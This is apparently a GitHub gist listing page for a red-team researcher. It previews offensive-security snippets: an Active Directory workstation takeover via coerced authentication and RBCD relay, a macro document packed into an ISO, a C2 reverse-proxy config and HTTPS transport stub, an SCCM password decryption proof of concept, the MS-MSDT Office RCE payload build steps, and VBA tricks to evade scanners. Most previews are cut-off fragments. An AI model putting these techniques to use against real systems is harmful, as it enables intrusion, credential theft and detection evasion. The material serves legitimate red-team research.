Mariusz Banach mgeeky
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
@mgeeky
mgeeky / Workstation-Takeover.md
Created September 15, 2022 20:26 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

mgeeky / gist:82d6abe0508ae81f107689864fb5dfc0
Created September 6, 2022 12:09
office-to-iso-with-motw.txt
# Pack macro-enabled doc to ISO
py PackMyPayload.py Resume1337.xlsm test11.iso
# Apply MOTW on that ISO
Set-Content -Path test11.iso -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
# Mount it
Mount-DiskImage -ImagePath test11.iso
mgeeky / AMSITools.psm1
Created August 5, 2022 13:05 — forked from mgraeber-rc/AMSITools.psm1
Get-AMSIEvent and Send-AmsiContent are helper functions used to validate AMSI ETW events. Note: because this script contains the word AMSI, it will be flagged by most AV engines. Add an exception on a test system accordingly in order to get this to work.
filter Send-AmsiContent {
<#
.SYNOPSIS
Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider.
Author: Matt Graeber
Company: Red Canary
.DESCRIPTION
mgeeky / Caddyfile
Created August 1, 2022 19:16 — forked from byt3bl33d3r/Caddyfile
Caddyfile reverse proxy example for C2 platforms
{
# This instructs Caddy to hit the LetsEncrypt staging endpoint, in production you should remove this.
acme_ca https://acme-staging-v02.api.letsencrypt.org/directory
}
(proxy_upstream) {
# Enable access logging to STDOUT
log
# This is our list of naughty client User Agents that we don't want accessing our C2
mgeeky / transport_https.c
Created July 11, 2022 21:24 — forked from Cracked5pider/transport_https.c
perform HTTPs requests using WinHTTP
BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize )
{
#ifdef TRANSPORT_HTTP
HANDLE hConnect = NULL;
HANDLE hSession = NULL;
HANDLE hRequest = NULL;
DWORD HttpFlags = 0;
LPVOID RespBuffer = NULL;
mgeeky / howToModifyOvaFile.md
Created July 5, 2022 21:00 — forked from afdevries/howToModifyOvaFile.md
How to modify an .ova file on Linux/Mac using the terminal: export the VM (OVF 1.0) from VirtualBox, then modify some tag and hash value so the VM can be imported into ESXi.

extract ova files from an archive

$ tar -xvf vmName.ova

modify ovf for some invalid tag

$ vi vmName.ovf
mgeeky / sccmdecryptpoc.cs
Created July 3, 2022 20:01 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
mgeeky / TlsCallback.cpp
Created June 14, 2022 18:58
TLS Callbacks demo in Windows GUI application, to be compiled with MSVC++. Originally authored by Elias Bachaalany, source: http://lallouslab.net/2017/05/30/using-cc-tls-callbacks-in-visual-studio-with-your-32-or-64bits-programs/
#define WIN32_LEAN_AND_MEAN
#include <iostream>
#include <windows.h>
VOID WINAPI TlsCallback1(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
if (Reason == DLL_PROCESS_ATTACH)
{
MessageBoxA(NULL, "Hello from TlsCallback1", "TlsCallback1", 0);
mgeeky / ms-msdt.MD
Created May 31, 2022 07:46 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
mgeeky / README.md
Created May 20, 2022 16:38
Call WinAPI dynamically from VBA using oleaut32.DispCallFunc to minimize number of Declare PtrSafe import statements

Synopsis

This PoC is currently not working properly.

The PoC demonstrates how to dynamically call WinAPI imported functions from VBA using oleaut32!DispCallFunc(...).

The idea is to get rid of most of the Private Declare PtrSafe Function SomeFunction Lib "kernel32.dll" Alias "Sleep" ( ... ) statements, which reveal the intent of dodgy VBA code.

From an offensive perspective, we'd prefer to have the fewest possible WinAPI import statements in our VBA to lower the detection rate of security-aware scanners.